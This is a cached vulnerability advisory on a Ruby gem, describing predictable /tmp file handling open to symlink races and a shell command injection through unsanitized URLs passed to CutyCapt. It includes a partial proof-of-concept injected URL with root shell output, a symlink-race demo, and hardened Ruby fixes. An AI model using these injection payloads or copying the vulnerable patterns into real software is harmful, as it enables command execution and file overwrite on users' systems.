Source: http://vapid.dhs.org/research/file_utils_ruby_gem.txt (Google cache snapshot of the page as it appeared on Apr 19, 2013 12:24:49 GMT)
Possible remote command execution and insecure file handling in /tmp.

http://rubygems.org/gems/fileutils

"A set of utility classes to extract meta data from different file types".

Files are handled insecurely in /tmp: for each file type a directory named after the extension,
say 'zip', is created directly under /tmp and the files are manipulated there.  The name is
predictable and the directory is created with an exists-then-mkdir sequence in a world-writable
location, so a malicious local user can hijack the directory and manipulate its contents.

in ./lib/file_utils.rb

    def zip (target, *sources)
        targetdir = "#{FileUtils::Config.tmp_dir}/zip"
        id = 1
        while File.exists?(targetdir)          # check: predictable name, anyone can pre-create it
            targetdir = "#{FileUtils::Config.tmp_dir}/zip#{id}"
            id += 1
        end
        FileUtils.mkdir(targetdir)             # act: the race window lies between the check and this

where Config.tmp_dir = /tmp

in ./lib/file_utils/config.rb

    def self.tmp_dir
        @tmp_dir ||= '/tmp'
    end


* Remote command execution:

From file_utils.rb: the URL passed to CutyCapt is interpolated, unsanitized, into a command string that backticks hand to the shell.  If the URL contains shell metacharacters, say a ';' followed by a command, a remote attacker can execute commands on the client's system if the client is enticed to fetch an encoded URL like:

* Need to test URL encoding; not sure if this is valid.

http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz

    def capture (url, target)
        command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url=#{url} --out=#{target}")
        `#{command}`                           # backticks run the whole string through /bin/sh
    end

Partial PoC, if the client is tricked into using a malicious URL:

irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt  --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf`
xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0> 

root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# ls -l /tmp/foo 
-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# cat /tmp/foo 
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# 
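As an added example (not code from the gem, from CutyCapt, or from this advisory), the vulnerable interpolation from capture() beside two hardened forms.  "echo" stands in for the xvfb-run/CutyCapt command line so it runs anywhere; the function names, the URL check and the constructed payload are mine.

```ruby
require "open3"
require "shellwords"
require "uri"

# Vulnerable pattern, as in capture() from file_utils.rb: the URL is
# interpolated into a string that backticks hand to /bin/sh. "echo" stands in
# for the xvfb-run/CutyCapt command line so the demo runs anywhere (assumption).
def capture_vulnerable(url, target)
  command = "echo --url=#{url} --out=#{target}"
  `#{command}`
end

# Defence in depth: only well-formed http(s) URLs reach the renderer. This is
# a filter, not the fix; RFC 3986 allows ';' in paths and hosts, so a URL can
# be valid and still split a shell command line.
def valid_http_url?(url)
  uri = URI.parse(url)
  %w[http https].include?(uri.scheme) && !uri.host.nil? && !uri.host.empty?
rescue URI::InvalidURIError
  false
end

# The fix: pass argv as separate strings so no shell ever parses the URL.
def capture_hardened(url, target)
  raise ArgumentError, "refusing non-http(s) URL: #{url.inspect}" unless valid_http_url?(url)
  out, status = Open3.capture2("echo", "--url=#{url}", "--out=#{target}")
  raise "renderer exited #{status.exitstatus}" unless status.success?
  out
end

# When a single command string is unavoidable (the gem routes its string
# through Config::Xvfb.command), quote every word with Shellwords so the shell
# sees exactly one argument per element.
def escaped_command(url, target)
  Shellwords.join(["echo", "--url=#{url}", "--out=#{target}"])
end

if __FILE__ == $0
  url = "http://example.org/;echo"              # constructed payload: ';' ends the first command
  puts capture_vulnerable(url, "INJECTED")      # two lines: the second comes from the injected command
  puts capture_hardened(url, "INJECTED")        # one line, URL passed through verbatim
  puts `#{escaped_command(url, "INJECTED")}`    # one line
end
```

The argv form is the real fix; the URL check only narrows what reaches the renderer, and the Shellwords form is for the case where the surrounding code insists on a string.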


Michael Scherer of Red Hat found other issues during a discussion about the issues I found above:

In fact, there is a similar problem in another file:

    result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb (a quick command line to type Ruby snippets),
and yes, using funky chars results in funky results.

There is another issue in
    # Generates a temp filepath for the given extension
    def temp (extension)
        path = "#{FileUtils::Config.tmp_dir}/tmp.#{extension}"
        id = 1
        while File.exists?(path)
            path = "#{FileUtils::Config.tmp_dir}/tmp.#{id}.#{extension}"
            id += 1
        end
        path
    end

since someone could just create the file at the last moment, and make a
link so the script would overwrite an arbitrary file.
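Added example, not from the gem or from Michael's mail: the predictable-name temp() pattern above with a simulated symlink race, beside the O_CREAT|O_EXCL form and the Tempfile/Dir.mktmpdir forms that also cover the zip() directory case from the top of this note.  It works in a private directory rather than /tmp; the attacker hook, the victim file and the function names are constructed for the demo.

```ruby
require "tmpdir"
require "tempfile"

# Predictable-name generator, mirroring temp() from the gem: the name depends
# only on what already exists, so another local user can predict it.
def predictable_temp_path(tmp_dir, extension)
  path = "#{tmp_dir}/tmp.#{extension}"
  id = 1
  while File.exist?(path)
    path = "#{tmp_dir}/tmp.#{id}.#{extension}"
    id += 1
  end
  path
end

# Vulnerable: choose the name, then write. The optional attacker hook stands in
# for a local user who wins the race between the exist? check and the write.
def vulnerable_write(tmp_dir, extension, data, attacker: nil)
  path = predictable_temp_path(tmp_dir, extension)
  attacker&.call(path)      # race window: nothing exists at path yet
  File.write(path, data)    # follows whatever the attacker planted there
  path
end

# Same predictable name, but opened with O_CREAT|O_EXCL: the open fails if
# anything, including a dangling symlink, already exists at the path, and the
# 0600 mode keeps other users out of the file.
def excl_write(tmp_dir, extension, data, attacker: nil)
  path = predictable_temp_path(tmp_dir, extension)
  attacker&.call(path)
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0600) { |f| f.write(data) }
  path
rescue Errno::EEXIST
  nil                       # refuse; the caller should retry with a fresh name
end

# The full fix: random, unguessable name plus O_EXCL and 0600, via Tempfile.create.
def hardened_write(tmp_dir, extension, data)
  f = Tempfile.create(["tmp.", ".#{extension}"], tmp_dir)
  f.write(data)
  f.close
  f.path
end

# The directory case (zip() in the gem): Dir.mktmpdir creates a random-named,
# 0700 directory in one step, so there is no exist?-then-mkdir race to win.
def hardened_work_dir(tmp_dir, prefix)
  Dir.mktmpdir(prefix, tmp_dir)
end

# Runs both writers against an attacker who plants a symlink to a victim file
# at the predicted name. Uses a private directory instead of /tmp.
def run_demo
  Dir.mktmpdir("fileutils-demo") do |tmp_dir|
    victim = File.join(tmp_dir, "victim.txt")    # constructed: the file the attacker wants overwritten
    File.write(victim, "original")
    plant = ->(path) { File.symlink(victim, path) }

    vulnerable_write(tmp_dir, "txt", "payload", attacker: plant)
    clobbered = File.read(victim)                 # "payload": the write followed the symlink

    File.write(victim, "original")
    refused = excl_write(tmp_dir, "txt", "payload", attacker: plant)
    kept = File.read(victim)                      # still "original"

    { clobbered: clobbered, refused: refused, kept: kept }
  end
end

puts run_demo.inspect if __FILE__ == $0
```

excl_write shows why the exist? check is worthless on its own: only an atomic create with O_EXCL (and a refusal on EEXIST, not a retry on the same name) closes the window, and Tempfile.create and Dir.mktmpdir add the unguessable name on top.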